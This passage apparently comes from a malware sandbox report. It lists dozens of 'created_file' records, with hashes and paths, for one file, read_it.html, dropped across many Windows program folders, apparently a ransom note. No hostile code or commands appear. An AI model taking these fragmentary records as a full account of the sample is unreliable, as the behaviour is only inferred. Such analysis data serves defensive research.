"norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_301", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_302", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_303", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_304", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_305", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_306", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_307", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_308", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_309", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_310", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_311", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_312", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_313", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_314", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_315", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\programdata\\mozilla\\logs\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_316", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\programdata\\adobe\\arm\\reader_10.0.0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_317", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_318", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_319", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\mozilla maintenance service\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_320", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_321", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_322", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_323", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_324", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_325", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_326", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_327", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_328", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_329", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_330", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_331", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_332", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_333", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_334", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_335", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_336", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\america\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_337", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_338", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_339", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_340", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_341", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_342", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\security\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_343", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\management\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_344", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\jfr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_345", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_346", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\i386\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_347", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\fonts\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_348", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\ext\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_349", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\deploy\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_350", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_351", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\lib\\cmm\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_352", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\java\\jre7\\bin\\client\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_353", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 